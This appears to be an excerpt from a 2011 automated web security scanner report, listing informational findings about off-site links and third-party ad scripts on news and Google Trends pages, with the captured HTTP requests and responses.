...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/nmemagazine" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/188057_9577714166_7953271_q.jpg" alt="NME Magazine" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203034_502474779_5408026_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/giancarlo.catucci" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173266_612917902_498390_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sinziana.boaru" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195627_1254209248_300618_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=524260038" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203266_524260038_7691922_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000527649467" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186959_100000527649467_241812_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1627505639" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195503_1627505639_5184381_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/je.everyme" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161098_1342374995_8016928_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sindum" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211292_775320136_3836729_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1359173429" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48977_1359173429_9520_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186038_661437099_2872173_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/AydinMAI68" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186643_100002173506333_2964858_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=56502224" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187443_56502224_3218985_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1310354027" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174098_1310354027_2873640_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/emreerbirer" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187140_100001144540097_3026451_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1094941774" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186064_1094941774_2246234_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=621947716" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187517_621947716_694488_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1012820442" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187090_1012820442_3696599_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1407013060" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187175_1407013060_4564630_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1030523268" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186187_1030523268_5039732_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000232136679" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41654_100000232136679_2814536_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/saveugandan.children" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161271_100001473310108_1002552_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1108593468" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161259_1108593468_4611679_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187591_100001316685403_3643929_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=586715048" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23093_586715048_772_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1684804485" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161721_1684804485_1928683_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ingrid.tegtmeier" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211338_505753734_1736542_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203280_575035348_5750338_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002357476036" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187522_100002357476036_5717414_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wongmingto" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203196_635357894_3340613_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...
15.40. http://www.google.com/trends/hottrends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /trends/hottrends?q=samoa&date=2011-5-9&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=SAd3ES8aFMFPPf9yKZ4t7oOXPDdsYBJulc84HWgSlZSZMSWL_m54PWT4b5AVWjuTnETTdph0uW3CVEHcwezP5Pp-rs1cZ83iLv9ixDxoHqK3BtOdYIU7TwLQBvqocehV

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2011 14:00:24 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11160

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: samoa, May 9, 2011</titl
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://apuntes-urbanos.blogspot.com/2011/05/samoa-volver-al-futuro.html" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://apuntes-urbanos.blogspot.com/" target="_blank"> http://apuntes-urbanos.blogspot.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://blogs.nature.com/news/2009/10/briefing_earthquakes_in_sumatr.html" target="_blank">
News Blog: Briefing: Earthquakes in Sumatra and <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://blogs.nature.com/news/thegreatbeyond/" target="_blank"> http://blogs.nature.com/news/thegreatbeyond/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.ecademy.com/node.php?id=163891" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.ecademy.com/module.php?mod=blog" target="_blank"> http://www.ecademy.com/module.php?mod=blog</a>
...[SNIP]...
15.41. http://www.google.com/trends/hottrends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /trends/hottrends?q=sufjan+stevens&date=2011-5-9&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=SAd3ES8aFMFPPf9yKZ4t7oOXPDdsYBJulc84HWgSlZSZMSWL_m54PWT4b5AVWjuTnETTdph0uW3CVEHcwezP5Pp-rs1cZ83iLv9ixDxoHqK3BtOdYIU7TwLQBvqocehV

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2011 14:00:03 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11181

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: sufjan stevens, May 9, 2
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.fullissue.com/index.php/sufjan-stevens-biography-1975.html" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.fullissue.com/" target="_blank"> http://www.fullissue.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://thesilvertongueonline.com/?p=26978" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://thesilvertongueonline.com/" target="_blank"> http://thesilvertongueonline.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://tuneoftheday.blogspot.com/2011/05/sufjan-stevens-futile-devices.html" target="_blank">
Tune Of The Day: <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://tuneoftheday.blogspot.com/" target="_blank"> http://tuneoftheday.blogspot.com/</a>
...[SNIP]...
15.42. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /hive/common/includes/google-adsense-content-orlnews.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /hive/common/includes/google-adsense-content-orlnews.html?client=ca-tribune_news3_html&google_ad_channel=Orlandosentinel_story_pos1&type=wide&page_url=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,2290449,print.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business; __switchTo5x=97; __unam=23536f-12fd50e4220-5f39d80-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Expires: Mon, 09 May 2011 13:59:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Google Ads</title>
<link href="/hive/stylesheets/sponsoredlinks-orlnews.css" media="all
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
16. Cross-domain script include  previous  next
There are 30 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

16.1. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Centro.com/B5245176.26

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5697
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:08 GMT
Expires: Mon, 09 May 2011 13:59:08 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon May 02 13:59:37 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</script>
<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>
16.2. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 14:01:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7033

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri May 06 13:07:08 EDT 2011 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://cdn.doubleverify.com/script152.js?agnc=563308&cmp=5229711&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=63617239&advid=998766&sid=327761&adid="></script>
...[SNIP]...
16.3. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="pUM1Iz9HMAYU1O2WQ6agQvHtomeqiTx+scbgotrS/irrnp9hR1uXbUVk0H3WxoeLl/xLNe9VpQo58/SfnwRIVPklZlA8PnoYUYWIbDUqYS9zQYnZsUoP3QRkponkl0tHHb8kkKwgkXBko7XOn1jpgcgJQ3/+sBnkvl0R76S9Yt1TpYoxEcshze8XSI9IYwGJZAQM8acKU6QFRiQuOSfWyKPrE4VIXPPwX8RUWiY/UssOCRqN2G4sqarRk4NsaJRnlj2K1Y5HUKhRsrHbW1pTdRNtT9ZKulZhziyboYdrEO2sarAl/MFVZsjwi/Wv3qLm1Fs/xHiIfiPD8ptaFv53hhEy0x9Nzgra6z5i1sNDBdwC2AMM5jmRxk1HiSJ7rc7geNXoMpcoW5lazev62kFjic7GRlCPMyreliDoEbRStv8bUX0hzqBtlrJJ71XkLAtbR3bp3YXVlT/i03+GD+X4pnqR31ooqOicd/3sY/HfyHpsfYFpK+9cKfsOK0TMqmEZgg6TVATszTa6DVBy+9HIW60cgGORBfFeA3V7ZWrc7A/f4TCz6oav7WuUpl/8FU3EZiYlcqNpGIiqu0EDyUFyBc0Mm83cLtn7n1YkzNAWKjM3BMlNOvL7luAFxGav7veb18OL8FnDLIcc98IdSjePgO4x+TnvWMc1o3LMnx7KFnEVNL/zr/l7lPtA+JVzT7cnj2wyE4QaQHKh6Ok04D+HbZpnYVGPcUhH7ir4iXn1X1fRi2WC4X27+2MYNn6XJpgOOB6hxeYRKJezFPVyYHA0E8k8Y6vPmqAzcUQ1GgmrtVMO5TynL7MxkjlDhd/qkAAADTkEWFYjM+71vkik63NbiYJzNhUruoYNDY4+Cdad8nntQwYFdaZi2z0oTqrM2W9VLHxiO/W3OZ/DoHhIVOR05q3qEJsSQqz4HlTPFqdP6tMOPEdT2mlN6I+snoH5H1+95/20PTZV63bqPslFDdpjQUzOUzlGEQz5vlwfpcobNG6ZffmcfXkVRA90ZS5vDX6RoLFO4jXs4PfHmOaxRujzc+ZZx71yBGG4cW6a3AIc/QKBNjPUub61ya2Yeam0YNeI4XUBKw1I8arhmHwBw24bTrJB78myPAavjRhXseaoyMiRz2SpgrQict90ITDGOCmvQzQHHUwrMEuS4OMOI9nlvFiigkXOsxfJqbwLbPJxK7vepa4gP5k5reKfLJLOzB1tAhyu+0M+ogOQqwjKAaQSNYVRfyphA/AzKCF02DWfoPvuUecdYTEKFjQ1VG+g3YxKNYroKXLd8VGMnDiPqMcBJGPJAP5XjR0FOhbahAhbE9hcU3YzJtc0N15WcuBwumA6aiTCtPbC5GocnaApsWij2wpzPNdaYaar/KwBLK+unvGZw9So2/L8umdKyijf1qIYR3BsN1iRRVSFtpq1rjLe/12ruK+l5hbTSkGCxSxVj27tdXKbj+wNhb0Grx0f0RVz96JdXLab+X7gER0OWV6Ub93Iau3V3nA8U2eR3eW8WCzYma60upmY8LQB1Wa9Fjetzfo="; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywl